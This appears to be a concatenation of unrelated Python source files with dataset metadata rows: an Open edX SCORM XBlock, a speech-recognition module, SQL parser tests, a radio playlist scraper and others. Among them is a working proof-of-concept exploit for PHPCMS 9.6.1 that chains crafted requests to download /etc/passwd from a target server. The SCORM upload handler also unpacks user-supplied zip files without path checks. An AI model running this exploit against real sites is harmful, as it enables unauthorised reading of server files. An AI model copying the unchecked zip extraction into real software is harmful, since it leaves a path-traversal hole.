from xblock.fields import Scope, String, Float, Boolean, Dict
from xblock.fragment import Fragment
# Make '_' a no-op so we can scrape strings
_ = lambda text: text
class ScormXBlock(XBlock):
display_name = String(
display_name=_("Display Name"),
help=_("Display name for this module"),
default="Scorm",
scope=Scope.settings,
)
scorm_file = String(
display_name=_("Upload scorm file"),
scope=Scope.settings,
)
version_scorm = String(
default="SCORM_12",
scope=Scope.settings,
)
# save completion_status for SCORM_2004
lesson_status = String(
scope=Scope.user_state,
default='not attempted'
)
success_status = String(
scope=Scope.user_state,
default='unknown'
)
lesson_location = String(
scope=Scope.user_state,
default=''
)
suspend_data = String(
scope=Scope.user_state,
default=''
)
data_scorm = Dict(
scope=Scope.user_state,
default={}
)
lesson_score = Float(
scope=Scope.user_state,
default=0
)
weight = Float(
default=1,
scope=Scope.settings
)
has_score = Boolean(
display_name=_("Scored"),
help=_("Select True if this component will receive a numerical score from the Scorm"),
default=False,
scope=Scope.settings
)
icon_class = String(
default="video",
scope=Scope.settings,
)
has_author_view = True
def resource_string(self, path):
"""Handy helper for getting resources from our kit."""
data = pkg_resources.resource_string(__name__, path)
return data.decode("utf8")
def student_view(self, context=None):
context_html = self.get_context_student()
template = self.render_template('static/html/scormxblock.html', context_html)
frag = Fragment(template)
frag.add_css(self.resource_string("static/css/scormxblock.css"))
frag.add_javascript(self.resource_string("static/js/src/scormxblock.js"))
settings = {
'version_scorm': self.version_scorm
}
frag.initialize_js('ScormXBlock', json_args=settings)
return frag
def studio_view(self, context=None):
context_html = self.get_context_studio()
template = self.render_template('static/html/studio.html', context_html)
frag = Fragment(template)
frag.add_css(self.resource_string("static/css/scormxblock.css"))
frag.add_javascript(self.resource_string("static/js/src/studio.js"))
frag.initialize_js('ScormStudioXBlock')
return frag
def author_view(self, context):
html = self.resource_string("static/html/author_view.html")
frag = Fragment(html)
return frag
@XBlock.handler
def studio_submit(self, request, suffix=''):
self.display_name = request.params['display_name']
self.has_score = request.params['has_score']
self.icon_class = 'problem' if self.has_score == 'True' else 'video'
if hasattr(request.params['file'], 'file'):
file = request.params['file'].file
zip_file = zipfile.ZipFile(file, 'r')
path_to_file = os.path.join(settings.PROFILE_IMAGE_BACKEND['options']['location'], self.location.block_id)
if os.path.exists(path_to_file):
shutil.rmtree(path_to_file)
zip_file.extractall(path_to_file)
self.set_fields_xblock(path_to_file)
return Response(json.dumps({'result': 'success'}), content_type='application/json')
@XBlock.json_handler
def scorm_get_value(self, data, suffix=''):
name = data.get('name')
if name in ['cmi.core.lesson_status', 'cmi.completion_status']:
return {'value': self.lesson_status}
elif name == 'cmi.success_status':
return {'value': self.success_status}
elif name == 'cmi.core.lesson_location':
return {'value': self.lesson_location}
elif name == 'cmi.suspend_data':
return {'value': self.suspend_data}
else:
return {'value': self.data_scorm.get(name, '')}
@XBlock.json_handler
def scorm_set_value(self, data, suffix=''):
context = {'result': 'success'}
name = data.get('name')
if name in ['cmi.core.lesson_status', 'cmi.completion_status']:
self.lesson_status = data.get('value')
if self.has_score and data.get('value') in ['completed', 'failed', 'passed']:
self.publish_grade()
context.update({"lesson_score": self.lesson_score})
elif name == 'cmi.success_status':
self.success_status = data.get('value')
if self.has_score:
if self.success_status == 'unknown':
self.lesson_score = 0
self.publish_grade()
context.update({"lesson_score": self.lesson_score})
elif name in ['cmi.core.score.raw', 'cmi.score.raw'] and self.has_score:
self.lesson_score = int(data.get('value', 0))/100.0
context.update({"lesson_score": self.lesson_score})
elif name == 'cmi.core.lesson_location':
self.lesson_location = data.get('value', '')
elif name == 'cmi.suspend_data':
self.suspend_data = data.get('value', '')
else:
self.data_scorm[name] = data.get('value', '')
context.update({"completion_status": self.get_completion_status()})
return context
def publish_grade(self):
if self.lesson_status == 'failed' or (self.version_scorm == 'SCORM_2004' and self.success_status in ['failed', 'unknown']):
self.runtime.publish(
self,
'grade',
{
'value': 0,
'max_value': self.weight,
})
else:
self.runtime.publish(
self,
'grade',
{
'value': self.lesson_score,
'max_value': self.weight,
})
def max_score(self):
"""
Return the maximum score possible.
"""
return self.weight if self.has_score else None
def get_context_studio(self):
return {
'field_display_name': self.fields['display_name'],
'display_name_value': self.display_name,
'field_scorm_file': self.fields['scorm_file'],
'field_has_score': self.fields['has_score'],
'has_score_value': self.has_score
}
def get_context_student(self):
scorm_file_path = ''
if self.scorm_file:
scheme = 'https' if settings.HTTPS == 'on' else 'http'
scorm_file_path = '{}://{}{}'.format(scheme, settings.ENV_TOKENS.get('LMS_BASE'), self.scorm_file)
return {
'scorm_file_path': scorm_file_path,
'lesson_score': self.lesson_score,
'weight': self.weight,
'has_score': self.has_score,
'completion_status': self.get_completion_status()
}
def render_template(self, template_path, context):
template_str = self.resource_string(template_path)
template = Template(template_str)
return template.render(Context(context))
def set_fields_xblock(self, path_to_file):
path_index_page = 'index.html'
try:
tree = ET.parse('{}/imsmanifest.xml'.format(path_to_file))
except IOError:
pass
else:
namespace = ''
for node in [node for _, node in ET.iterparse('{}/imsmanifest.xml'.format(path_to_file), events=['start-ns'])]:
if node[0] == '':
namespace = node[1]
break
root = tree.getroot()
if namespace:
resource = root.find('{{{0}}}resources/{{{0}}}resource'.format(namespace))
schemaversion = root.find('{{{0}}}metadata/{{{0}}}schemaversion'.format(namespace))
else:
resource = root.find('resources/resource')
schemaversion = root.find('metadata/schemaversion')
if resource:
path_index_page = resource.get('href')
if (not schemaversion is None) and (re.match('^1.2$', schemaversion.text) is None):
self.version_scorm = 'SCORM_2004'
self.scorm_file = os.path.join(settings.PROFILE_IMAGE_BACKEND['options']['base_url'],
'{}/{}'.format(self.location.block_id, path_index_page))
def get_completion_status(self):
completion_status = self.lesson_status
if self.version_scorm == 'SCORM_2004' and self.success_status != 'unknown':
completion_status = self.success_status
return completion_status
@staticmethod
def workbench_scenarios():
"""A canned scenario for display in the workbench."""
return [
("ScormXBlock",
"""<vertical_demo>
<scormxblock/>
</vertical_demo>
"""),
]
| 35.059041 | 131 | 0.592674 | 9,076 | 0.955268 | 0 | 0 | 3,021 | 0.317967 | 0 | 0 | 1,990 | 0.209452 |
1fb35315892b484eea92d588c1ea5a815edbedc1
| 4,861 |
py
|
Python
|
src/core/modules/stt.py
|
pyVoice/pyVoice
|
62e42a5c6307df2dd2d74bcd20ca64fd81c58851
|
[
"MIT"
] | 1 |
2020-12-12T12:06:12.000Z
|
2020-12-12T12:06:12.000Z
|
src/core/modules/stt.py
|
pyVoice/pyVoice
|
62e42a5c6307df2dd2d74bcd20ca64fd81c58851
|
[
"MIT"
] | 24 |
2021-02-08T19:44:44.000Z
|
2021-04-10T11:54:53.000Z
|
src/core/modules/stt.py
|
pyVoice/pyVoice
|
62e42a5c6307df2dd2d74bcd20ca64fd81c58851
|
[
"MIT"
] | null | null | null |
"""
**Speech to Text (STT) engine**
Converts the user speech (audio) into text.
"""
import threading
import traceback
import speech_recognition as sr
from src import settings
from src.core.modules import log, tts, replying
def setup() -> None:
"""
Initializes the STT engine
Steps:
1. Creates a new `Recognizer` object
2. Configures the energy threshold
"""
global recognizer
recognizer = sr.Recognizer()
recognizer.dynamic_energy_threshold = False
recognizer.energy_threshold = settings.SR_ENERGY_THRESHOLD
def listen() -> sr.AudioData:
"""
Listens for user input (voice) and returns it
Returns:
sr.AudioData: The raw input data
"""
with sr.Microphone() as raw_microphone_input:
log.debug("Listening to ambient...")
audio = recognizer.listen(raw_microphone_input)
return audio
def recognize(audio: sr.AudioData) -> str:
"""
Transcribes human voice data from a `AudioData` object (from `listen`)
Args:
audio (sr.AudioData): The raw audio data from the user
Returns:
str: A sentence/phrase with the user intent
"""
output = None
log.debug("Recognizing audio...")
if settings.STT_ENGINE == "google":
try:
output = recognizer.recognize_google(audio, language=settings.LANGUAGE)
except sr.UnknownValueError:
log.debug("Speech engine could not resolve audio")
except sr.RequestError:
log.error("An error ocurred with the Google services, try again")
except:
traceback.print_exc()
log.error("A unknown error ocurred...")
finally:
return output
def recognize_keyword() -> None:
"""
Listens for the keyword, to activate the assistant.
Steps:
1. Listens for audio from the microphone
2. Recognizes the audio using `gTTS`
3. Checks if the keyword (as in `settings.KEYWORD`) is in the audio data (if True, break loop)
"""
global keyword_detected
global new_process
audio = listen()
new_process = True
log.debug("Recognizing keyword...")
try:
rec_input = recognizer.recognize_google(audio, language=settings.LANGUAGE)
if settings.KEYWORD in rec_input.lower():
log.debug("Keyword detected!")
# stop listening
keyword_detected = True
else:
log.debug("Keyword not detected in '{0}'".format(rec_input))
except sr.UnknownValueError:
log.debug("Speech engine could not resolve audio")
except sr.RequestError:
log.error("An error ocurred with the Google services, try again")
except:
traceback.print_exc()
log.error("A unknown error ocurred...")
def listen_for_keyword() -> bool:
"""
Loops until the keyword is recognized from the user input (from `recognize_keyword`).
Steps:
1. Enters the loop (keyword detection)
2. Creates a new thread (using `recognize_keyword` as target)
3. If the keywork is detected, break the loop and play the activation sound
Returns:
bool: Whether the keyword is recognizes or not. If not, continue the loop.
"""
global keyword_detected
global new_process
log.debug("Keyword loop...")
keyword_detected = False
new_process = True
log.info("Waiting for '{0}'...".format(settings.KEYWORD))
while True:
if keyword_detected:
break
if new_process:
new_process = False
threading.Thread(target=recognize_keyword).start()
tts.play_mp3(settings.ACTIVATION_SOUND_PATH)
return True
def listen_for_binary() -> bool:
"""
Checks if a binary/boolean value (Yes/No) is present in the transcribed audio.
Used in Yes/No questions (e.g. *"Do you want X?"*)
Steps:
1. Listens for audio from the microphone
2. Recognizes the audio using `gTTS`
3. Checks if a boolean value (Yes, No, True, False) is present in the audio data
Returns:
bool: Wheter a boolean value is present in the audio data
"""
yes_reply = replying.get_reply(["stt", "yn_y"], system=True, module=True)
no_reply = replying.get_reply(["stt", "yn_n"], system=True, module=True)
log.info("Waiting for {0} or {1}".format(yes_reply, no_reply))
while True:
audio = listen()
rec_input = recognize(audio)
if rec_input:
if yes_reply in rec_input.lower():
log.debug("'{0}' detected".format(yes_reply))
return True
elif no_reply in rec_input.lower():
log.debug("'{0}' detected".format(no_reply))
return False
else:
log.debug("Not detected binary answer in {0}".format(rec_input))
| 27.619318 | 102 | 0.632174 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,218 | 0.456285 |
1fb417062e3b9b19b6daba41e40d879e942a6790
| 203 |
py
|
Python
|
px511-2021/code/qrCode/TestQrCode.py
|
Relex12/Decentralized-Password-Manager
|
0b861a310131782003a469d9c436e04e5bb05420
|
[
"MIT"
] | null | null | null |
px511-2021/code/qrCode/TestQrCode.py
|
Relex12/Decentralized-Password-Manager
|
0b861a310131782003a469d9c436e04e5bb05420
|
[
"MIT"
] | null | null | null |
px511-2021/code/qrCode/TestQrCode.py
|
Relex12/Decentralized-Password-Manager
|
0b861a310131782003a469d9c436e04e5bb05420
|
[
"MIT"
] | null | null | null |
from QrCode import *
# Sert pour tester sur un même pc à la fois la génération du QrCode et la lecture de celui ci
if __name__ == '__main__':
sync_other_device_QrCode()
sync_this_device_QrCode()
| 33.833333 | 93 | 0.753695 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 107 | 0.516908 |
1fb4d55d5bca1b790eead271507bcc6a81cff6e7
| 7,289 |
py
|
Python
|
tests/test_api.py
|
brycecaine/sqlpt
|
98b2d72d5f59f92e95a9172dfb0dab92018076f9
|
[
"MIT"
] | null | null | null |
tests/test_api.py
|
brycecaine/sqlpt
|
98b2d72d5f59f92e95a9172dfb0dab92018076f9
|
[
"MIT"
] | 3 |
2021-12-27T21:53:11.000Z
|
2021-12-27T21:53:11.000Z
|
tests/test_api.py
|
brycecaine/sqlpt
|
98b2d72d5f59f92e95a9172dfb0dab92018076f9
|
[
"MIT"
] | null | null | null |
import unittest
import sqlparse
from sqlparse import tokens as T
from sqlparse.sql import (Identifier,
Statement, Token,
TokenList)
from context import (
extract_from_clause, extract_where_clause, tokenize) # , fused)
from context import (
Query, Join, Table, FromClause, WhereClause, Field, Comparison)
class TestApi(unittest.TestCase):
def test_extract(self):
sql = ("select id, "
" name "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
whitespace = Token(T.Whitespace, ' ')
table_1 = Table('tbl_stu')
table_2 = Table('tbl_stu_crs')
token_1 = Token(T.Name, 'tbl_stu.id')
token_list_1 = TokenList([token_1])
field_1 = Identifier(token_list_1)
comparison_token = Token(T.Operator, '=')
comparison_list = TokenList([comparison_token])
comparison_1 = Identifier(comparison_list)
token_2 = Token(T.Name, 'tbl_stu_crs.stu_id')
token_list_2 = TokenList([token_2])
field_2 = Identifier(token_list_2)
join_comparison = Comparison(field_1, '=', field_2)
join_1 = Join(table_1, table_2, join_comparison)
joins = [join_1]
from_clause = FromClause(joins)
from_clause_expected = str(from_clause)
from_clause_actual = str(extract_from_clause(sql))
self.assertEqual(from_clause_actual, from_clause_expected)
def test_compare_sql(self):
sql_1 = ("select id, "
" name "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
sql_2 = ("select id, "
" name, "
" major "
" from tbl_stu_crs "
" join tbl_stu "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
from_clause_1 = extract_from_clause(sql_1)
from_clause_2 = extract_from_clause(sql_2)
where_clause_1 = extract_where_clause(sql_1)
where_clause_2 = extract_where_clause(sql_2)
self.assertEqual(from_clause_1, from_clause_2)
self.assertEqual(where_clause_1, where_clause_2)
def test_parse(self):
sql = ("select id, "
" name "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" join tbl_stu_crs_grd "
" on a = b "
" and c = d "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
sql_tokens = tokenize(sql)
# dir(sql_tokens[-1])
# sql_tokens[-1].tokens
class TestQuery(unittest.TestCase):
def test_extract(self):
sql = ("select id, "
" name "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
whitespace = Token(T.Whitespace, ' ')
table_1 = Table('tbl_stu')
table_2 = Table('tbl_stu_crs')
token_1 = Token(T.Name, 'tbl_stu.id')
token_list_1 = TokenList([token_1])
field_1 = Identifier(token_list_1)
comparison_token = Token(T.Operator, '=')
comparison_list = TokenList([comparison_token])
comparison_1 = Identifier(comparison_list)
token_2 = Token(T.Name, 'tbl_stu_crs.stu_id')
token_list_2 = TokenList([token_2])
field_2 = Identifier(token_list_2)
join_comparison = Comparison(field_1, '=', field_2)
join_1 = Join(table_1, table_2, join_comparison)
joins = [join_1]
from_clause = FromClause(joins)
from_clause_expected = str(from_clause)
query = Query(sql)
from_clause_actual = str(query.from_clause())
self.assertEqual(from_clause_actual, from_clause_expected)
def test_compare_sql(self):
sql_1 = ("select id, "
" name "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
sql_2 = ("select id, "
" name, "
" major "
" from tbl_stu_crs "
" join tbl_stu "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
query_1 = Query(sql_1)
query_2 = Query(sql_2)
from_clause_1 = query_1.from_clause()
from_clause_2 = query_2.from_clause()
where_clause_1 = query_1.where_clause()
where_clause_2 = query_2.where_clause()
self.assertEqual(from_clause_1, from_clause_2)
self.assertEqual(where_clause_1, where_clause_2)
def test_parse(self):
sql = ("select id, "
" name "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" join tbl_stu_crs_grd "
" on a = b "
" and c = d "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
query = Query(sql)
self.assertTrue(query)
# dir(sql_tokens[-1])
# sql_tokens[-1].tokens
def test_fuse(self):
sql_1 = ("select id, "
" name, "
" first_term "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2019-Fa' "
" and major = 'MAGC';")
sql_2 = ("select id, "
" name, "
" major "
" from tbl_stu_crs "
" join tbl_stu "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
sql_3 = ("select id, "
" name, "
" first_term, "
" major "
" from tbl_stu_crs "
" join tbl_stu "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where major = 'MAGC' "
" and enrl = 1 "
" and stu_sem = ':stu_sem';")
query_1 = Query(sql_1)
query_2 = Query(sql_2)
query_3 = Query(sql_3)
# query_4 = fused(query_1, query_2)
# self.assertEqual(query_4, query_3)
parameter_fields = ['stu_sem']
query_1.fuse(query_2).parameterize(parameter_fields)
self.assertEqual(query_1, query_3)
if __name__ == '__main__':
unittest.main()
| 30.755274 | 68 | 0.498697 | 6,867 | 0.942105 | 0 | 0 | 0 | 0 | 0 | 0 | 2,244 | 0.307861 |
1fb53f7f4bb36d6fa18b06b4d87e7b488b8f5de0
| 1,356 |
py
|
Python
|
src/phpcms/9.6.1/任意文件下载漏洞/download-exp.py
|
baidu-security/app-env-docker
|
794f4d23a4ff61e045108977119eb0e529bb0213
|
[
"Apache-2.0"
] | 226 |
2018-02-17T07:18:12.000Z
|
2022-03-24T01:04:41.000Z
|
src/phpcms/9.6.1/任意文件下载漏洞/download-exp.py
|
baidu-security/app-env-docker
|
794f4d23a4ff61e045108977119eb0e529bb0213
|
[
"Apache-2.0"
] | 7 |
2018-07-14T07:59:47.000Z
|
2021-05-07T06:30:54.000Z
|
src/phpcms/9.6.1/任意文件下载漏洞/download-exp.py
|
baidu-security/app-env-docker
|
794f4d23a4ff61e045108977119eb0e529bb0213
|
[
"Apache-2.0"
] | 51 |
2018-04-20T15:39:06.000Z
|
2022-03-24T16:27:41.000Z
|
# coding: utf-8
'''
name: PHPCMS v9.6.1 任意文件下载
author: Anka9080
description: 过滤函数不严谨导致任意文件下载。
'''
import sys
import requests
import re
def poc(target):
print('第一次请求,获取 cookie_siteid ')
url = target +'index.php?m=wap&c=index&a=init&siteid=1'
s = requests.Session()
r = s.get(url)
cookie_siteid = r.headers['set-cookie']
cookie_siteid = cookie_siteid[cookie_siteid.index('=')+1:]
# print cookie_siteid
print('第二次请求,获取 att_json ')
url = target + 'index.php?m=attachment&c=attachments&&a=swfupload_json&aid=1&src=%26i%3D1%26m%3D1%26d%3D1%26modelid%3D2%26catid%3D6%26s%3D/etc/passw%26f%3Dd%3%25252%2*70C'
post_data = {
'userid_flash':cookie_siteid
}
r = s.post(url,post_data)
# print r.headers
for cookie in s.cookies:
if '_att_json' in cookie.name:
cookie_att_json = cookie.value
# print cookie_att_json
print('第三次请求,获取 文件下载链接 ')
url = target + 'index.php?m=content&c=down&a=init&a_k=' + cookie_att_json
r = s.get(url)
if 'm=content&c=down&a=download&a_k=' in r.text:
para = re.findall(r'(\?m=content&c=down&a=download&a_k=[^"]*)', r.text)
url = target + "index.php" + para[0]
r = s.get(url)
print('获取文件:')
print(r.content)
return True
else:
return False
if __name__ == "__main__":
poc(sys.argv[1])
| 30.133333 | 175 | 0.634956 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 715 | 0.487057 |
1fb73cc1aa55107790f427e4e1e4f03476a6ace6
| 1,493 |
py
|
Python
|
packages/w3af/w3af/core/controllers/profiling/scan_log_analysis/data/errors.py
|
ZooAtmosphereGroup/HelloPackages
|
0ccffd33bf927b13d28c8f715ed35004c33465d9
|
[
"Apache-2.0"
] | null | null | null |
packages/w3af/w3af/core/controllers/profiling/scan_log_analysis/data/errors.py
|
ZooAtmosphereGroup/HelloPackages
|
0ccffd33bf927b13d28c8f715ed35004c33465d9
|
[
"Apache-2.0"
] | null | null | null |
packages/w3af/w3af/core/controllers/profiling/scan_log_analysis/data/errors.py
|
ZooAtmosphereGroup/HelloPackages
|
0ccffd33bf927b13d28c8f715ed35004c33465d9
|
[
"Apache-2.0"
] | null | null | null |
import re
from utils.output import KeyValueOutput
ERRORS_RE = [re.compile('Unhandled exception "(.*?)"'),
re.compile('traceback', re.IGNORECASE),
re.compile('w3af-crash'),
re.compile('scan was able to continue by ignoring those'),
re.compile('The scan will stop')]
IGNORES = [u'The fuzzable request router loop will break']
# Original log line without any issues:
#
# AuditorWorker worker pool internal thread state: (worker: True, task: True, result: True)
#
# When there is ONE missing True, we have issues, when the pool finishes all three are False
POOL_INTERNAL = 'pool internal thread state'
def matches_ignore(line):
for ignore in IGNORES:
if ignore in line:
return True
return False
def get_errors(scan_log_filename, scan):
scan.seek(0)
errors = []
for line in scan:
for error_re in ERRORS_RE:
match = error_re.search(line)
if match and not matches_ignore(line):
line = line.strip()
errors.append(line)
scan.seek(0)
for line in scan:
if POOL_INTERNAL not in line:
continue
if line.count('True') in (0, 3):
continue
line = line.strip()
errors.append(line)
output = KeyValueOutput('errors', 'errors and exceptions', {'count': len(errors),
'errors': errors})
return output
| 25.305085 | 95 | 0.592096 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 471 | 0.315472 |
1fb8522ba4f170c8979ed698897c6d122c029720
| 196 |
py
|
Python
|
maximum_average_subarray_i.py
|
spencercjh/sync-leetcode-today-problem-python3-example
|
4957e5eadb697334741df0fc297bec2edaa9e2ab
|
[
"Apache-2.0"
] | null | null | null |
maximum_average_subarray_i.py
|
spencercjh/sync-leetcode-today-problem-python3-example
|
4957e5eadb697334741df0fc297bec2edaa9e2ab
|
[
"Apache-2.0"
] | null | null | null |
maximum_average_subarray_i.py
|
spencercjh/sync-leetcode-today-problem-python3-example
|
4957e5eadb697334741df0fc297bec2edaa9e2ab
|
[
"Apache-2.0"
] | null | null | null |
class MaximumAverageSubarrayI:
"""
https://leetcode-cn.com/problems/maximum-average-subarray-i/
"""
def findMaxAverage(self, nums: List[int], k: int) -> float:
| 19.6 | 64 | 0.602041 | 185 | 0.943878 | 0 | 0 | 0 | 0 | 0 | 0 | 76 | 0.387755 |
1fb8c0338db15cdfd4d8333778bf52ca725b2f55
| 5,925 |
py
|
Python
|
__main__.py
|
Naruto0/fplyst
|
af5c30a5bbd91ace21c3c5305c8e202ba016ba09
|
[
"MIT"
] | null | null | null |
__main__.py
|
Naruto0/fplyst
|
af5c30a5bbd91ace21c3c5305c8e202ba016ba09
|
[
"MIT"
] | 3 |
2021-03-22T17:12:14.000Z
|
2021-12-13T19:39:39.000Z
|
__main__.py
|
Naruto0/fplyst
|
af5c30a5bbd91ace21c3c5305c8e202ba016ba09
|
[
"MIT"
] | null | null | null |
#! /usr/bin/python3
#
# Usage:
#
# path/to/script$ python3 __main__.py -c <config_file>
#
# Will create 'YYYY_MM_DD_STREAMNAME_PLAYLIST.txt' file
# which will contain currently captured song
#
# HH:MM Interpret - Song Name
#
# To capture whole playlist you have to
# make crontab scheldule or widows/mac equivalent.
#
# Crontab job should run every minute
# which is enough to make sure the timing is
# correct.
# You may like to be sure that the files are
# saved at the directory, config file is optional:
#
# */1 * * * * cd <path to script> && python3 __main__.py [-c myConfig.json]
#
# If you want to make your own config file
# edit the variables which make the _dictionary
# underneath the imports.
# (e.g. _station, _url, _interpret_path, _song_name_path)
#
# Then run:
#
# you@host~/.../fplyst$ python3 -i __main__.py
#
# In python prompt you either call method
# without any attributes, which overwrites
# original config file...
#
# >>> make_config()
#
# ...or you feed it with a filename,
# which you may than use to import
# config for various stations.
#
# >>> make_config("myConfig.json")
#
# (json extension is optional)
#
# If you are familiar enough with xpath syntax,
# it shouldn't be hard for you to easily
# setup html xpaths to interpret and song.
#
# TODO: include selenium to support javascript generated <html>
import sys
import json
import getopt
import time as _t
from requests import get
from requests.exceptions import ConnectionError, SSLError
with open("requirements.txt", "r") as _req_file:
_req = _req_file.readlines()
try:
from lxml import html
from selenium import webdriver
from pyvirtualdisplay import Display
except ImportError:
if _req:
print("You have to install modules: ")
for module in _req:
print("\t%s"%module)
else:
print("Unexpected error")
sys.exit(2)
_config = {}
_selenium = False
_station = 'EVROPA2'
_url = 'https://www.evropa2.cz'
_interpret_path = '//h3[@class="author"]'
_song_name_path = '//h4[@class="song"]'
_dictionary = { 'station':_station, 'web_page':_url, \
'interpret_xpath':_interpret_path,\
'song_xpath':_song_name_path}
def write_last(song):
song_info = song[:2]
station = song[2]
last_name = ".last_on_%s.json"%(station)
with open(last_name, 'w') as f:
json.dump(song, f)
def read_last(station=None):
try:
last_name = ".last_on_%s.json"%(station)
with open(last_name, 'r') as f:
data = json.load(f)
return data
except IOError:
return []
def make_config(filename=None):
if filename:
config_file = filename
else:
filename = 'config.json'
with open(filename, 'w') as f:
json.dump(_dictionary, f)
def read_config(filename):
try:
with open(filename, 'r') as f:
global _config
_config = json.load(f)
except EnvironmentError:
print('bad config file "%s"'%filename)
sys.exit(2)
def get_time():
'''What time it is now?'''
now = _t.localtime()
date = _t.strftime("%Y_%m_%d", now)
hour_minute = _t.strftime("%H:%M", now)
return [date, hour_minute]
def save(args):
'''We are definitely saving this song.'''
file_name = "%s_%s_PLAYLIST.txt"%(args[3],args[2])
string = "%s\t%s - %s\n"%(args[4],args[0],args[1])
with open(file_name, "a") as myfile:
myfile.write(string)
def record(*args,**kwargs):
'''Do we really need to save current song?'''
playing = fetch(*args,**kwargs)
print(playing)
current = read_last(playing[2])
if playing:
if current != playing:
save(playing+get_time())
write_last(playing)
else:
# print("[log-%s]not saving %s - %s"%(get_time()[1],current[0],current[1]))
pass
def fetch(web_page, interpret_xpath, song_xpath, station):
'''What are they playing?'''
global _selenium
if _selenium:
display = Display(visible=0, size=(800, 600))
display.start()
browser = webdriver.Firefox()
browser.get(web_page)
try:
interpret = browser.find_element_by_xpath(interpret_xpath).text
except:
interpret = ''
try:
song = browser.find_element_by_xpath(song_xpath).text
except:
song = ''
browser.quit()
display.stop()
if interpret and song:
return [interpret, song, station]
else:
return ['','',station]
else:
try:
page = get(web_page)
except SSLError:
page = get(web_page, verify=False)
except ConnectionError:
print ("No internet connection aviable")
sys.exit(2)
tree = html.fromstring(page.content)
interpret_list = tree.xpath(interpret_xpath)
song_list = tree.xpath(song_xpath)
if interpret_list and song_list:
return [interpret_list[0], song_list[0], station]
else:
return []
def job(name):
print(name)
record()
def main(argv):
read_config('config.json')
global _selenium
help_string = '''__main__.py -c <config_file.json> \t -or we load default config.json
-h \t\t - help
-s \t\t - use selenium instead of requests (for javascript generated html)'''
if argv:
try:
opts, args = getopt.getopt(argv,"hsc:",["conf="])
except getopt.GetoptError:
print(help_string)
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print(help_string)
sys.exit(2)
elif opt == '-s':
_selenium = True
elif opt in('-c','--conf'):
read_config(arg)
record(**_config)
if __name__ == '__main__':
main(sys.argv[1:])
| 25.320513 | 89 | 0.606076 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,118 | 0.357468 |
1fbb637cd9392b8a2ffe427325fa61c758a9f423
| 14,341 |
py
|
Python
|
1_ps4/ps4b.py
|
gyalpodongo/6.0001_psets
|
b2e12d572d3382921a073e6712a337f98ade7c4a
|
[
"MIT"
] | null | null | null |
1_ps4/ps4b.py
|
gyalpodongo/6.0001_psets
|
b2e12d572d3382921a073e6712a337f98ade7c4a
|
[
"MIT"
] | null | null | null |
1_ps4/ps4b.py
|
gyalpodongo/6.0001_psets
|
b2e12d572d3382921a073e6712a337f98ade7c4a
|
[
"MIT"
] | null | null | null |
# Problem Set 4B
# Name: Gyalpo Dongo
# Collaborators:
# Time Spent: 9:00
# Late Days Used: 1
import string
### HELPER CODE ###
def load_words(file_name):
'''
file_name (string): the name of the file containing
the list of words to load
Returns: a list of valid words. Words are strings of lowercase letters.
Depending on the size of the word list, this function may
take a while to finish.
'''
print("Loading word list from file...")
# inFile: file
inFile = open(file_name, 'r')
# wordlist: list of strings
wordlist = []
for line in inFile:
wordlist.extend([word.lower() for word in line.split(' ')])
print(" ", len(wordlist), "words loaded.")
return wordlist
def is_word(word_list, word):
'''
Determines if word is a valid word, ignoring
capitalization and punctuation
word_list (list): list of words in the dictionary.
word (string): a possible word.
Returns: True if word is in word_list, False otherwise
Example:
>>> is_word(word_list, 'bat') returns
True
>>> is_word(word_list, 'asdf') returns
False
'''
word = word.lower()
word = word.strip(" !@#$%^&*()-_+={}[]|\:;'<>?,./\"")
return word in word_list
def get_story_string():
"""
Returns: a story in encrypted text.
"""
f = open("story.txt", "r")
story = str(f.read())
f.close()
return story
def get_digit_shift(input_shift, decrypt):
'''
calculate the digit shift based on if decrypting or not
decrypt: boolean, if decrypting or not
Returns: digit_shift, the digit shift based on if decrypting or not
'''
if decrypt:
digit_shift = 10 - (26-input_shift)%10
else:
digit_shift = input_shift
return digit_shift
### END HELPER CODE ###
WORDLIST_FILENAME = 'words.txt'
class Message(object):
def __init__(self, input_text):
'''
Initializes a Message object
input_text (string): the message's text
a Message object has two attributes:
self.message_text (string, determined by input text)
self.valid_words (list, determined using helper function load_words)
'''
self.message_text = input_text
self.valid_words = load_words(WORDLIST_FILENAME)
def get_message_text(self):
'''
Used to safely access self.message_text outside of the class
Returns: self.message_text
'''
return self.message_text
def get_valid_words(self):
'''
Used to safely access a copy of self.valid_words outside of the class.
This helps you avoid accidentally mutating class attributes.
Returns: a COPY of self.valid_words
'''
return self.valid_words.copy()
def make_shift_dict(self, input_shift, decrypt=False):#THINK NEG NUMBERS
'''
Creates a dictionary that can be used to apply a cipher to a letter and number.
The dictionary maps every uppercase and lowercase letter to a
character shifted down the alphabet by the input shift, as well as
every number to one shifted down by the same amount. If 'a' is
shifted down by 2, the result is 'c' and '0' shifted down by 2 is '2'.
